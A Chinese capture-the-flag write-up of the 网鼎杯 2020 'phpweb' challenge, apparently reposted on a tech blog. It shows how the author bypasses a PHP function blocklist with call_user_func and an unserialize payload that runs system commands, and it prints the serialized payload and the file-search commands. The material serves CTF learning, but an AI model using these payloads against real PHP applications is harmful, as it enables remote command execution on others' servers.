[网鼎杯 2020 朱雀组]phpweb
2021/10/29 20:39:46
本文主要是介绍[网鼎杯 2020 朱雀组]phpweb,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
[网鼎杯 2020 朱雀组]phpweb
打开环境就看到一行报错
好像是时间设置的有问题,尝试抓包解决,发现post数据里有两个参数
瞎搞了一会没啥突破,也不知道这里面到底是啥意思,上网寻求帮助,最后看到有一个博主说,看到这两个参数,会想到一个是函数名,另一个是要传的参数,这里很有可能是用了call_user_func()函数,然后简单看了一下这个函数是干嘛的,就是给他一个函数名,他就会去调用执行那个函数。
如果是这个意思的话,那我岂不是可以直接执行命令了?
结果,直接被拦下来了......
应该是有些函数不能用了,好在我之前总结了一点点php的函数及其功能,现在就是不知道哪些函数被禁用了,所以得慢慢试,得想办法拿到源码。
尝试readfile()
OK!拿到源码:
<?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents"); function gettime($func, $p) { $result = call_user_func($func, $p); $a= gettype($result); if ($a == "string") { return $result; } else {return "";} } class Test { var $p = "Y-m-d h:i:s a"; var $func = "date"; function __destruct() { if ($this->func != "") { echo gettime($this->func, $this->p); } } } $func = $_REQUEST["func"]; $p = $_REQUEST["p"]; if ($func != null) { $func = strtolower($func); if (!in_array($func,$disable_fun)) { echo gettime($func, $p); }else { die("Hacker..."); } }
system不给用了,那这除了用ls查看目录,还可以用scandir函数来查看目录,但测试完后发现他并不能显示返回结果
后来注意到他代码里有一段判断数据类型的操作,于是去查看了一下scandir函数的返回类型,不出所料,他的返回类型是一个数组,而不是字符串。由于目前还没找到其他方法来查看目录,于是想偷懒,因为之前做的题目大多数都是将flag文件之间放在根目录下的,于是想用file_get_contents()函数直接读/flag,但这次好像不太一样了,页面提示文件不存在。
果然,偷懒的方法行不通了,只能规规矩矩的去检查他的目录了,一筹莫展之际,突然发现我源码还没看完呢,中间还有一个叫test的类,他里面也调用了那个gettime的方法,而且里面还没检查黑名单,如果可以利用的话,不就可以执行system函数了嘛。
这个test方法看一眼就想到了魔术方法、反序列化的东西,不多废话了,直接先测试看看
本地运行脚本
<?php class Test { var $p = "ls"; var $func = "system"; function __destruct() { if ($this->func != "") { echo "success!!!"; } } } $a=new Test(); echo serialize($a); ?> 运行结果: O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
然后在靶机那只要再使用unserialize()就可以了
可以发现命令可以执行,那下面只要慢慢找就行了
最终在tmp目录下找到文件名为flagoefiu4r93文件很可疑,直接cat
拿到flag!
后来查看其它大佬写的writeup,发现有一种命令可以更快的找到flag文件,而且不用自己一个一个去找,命令如下
find / -name flag*
这个扫描结果可能会很慢,我测试时用了近1分钟才出结果。
这篇关于[网鼎杯 2020 朱雀组]phpweb的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-19php8的协程和hyperf的协程有什么区别?-icode9专业技术文章分享
- 2024-12-19php8 的fiber是什么?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-11-29使用PHP 将ETH账户的资产汇集到一个账户
- 2024-11-23怎么实现安卓+php 热更新方案?-icode9专业技术文章分享
- 2024-11-22PHP 中怎么实现判断多个值是否为空、null 或者为 false?-icode9专业技术文章分享
- 2024-11-11开源 PHP 商城项目 CRMEB 二次开发和部署教程
- 2024-11-09怎么使用php在kaufland平台刊登商品?-icode9专业技术文章分享
- 2024-11-05PHP的抽象类和接口是什么,有什么区别-icode9专业技术文章分享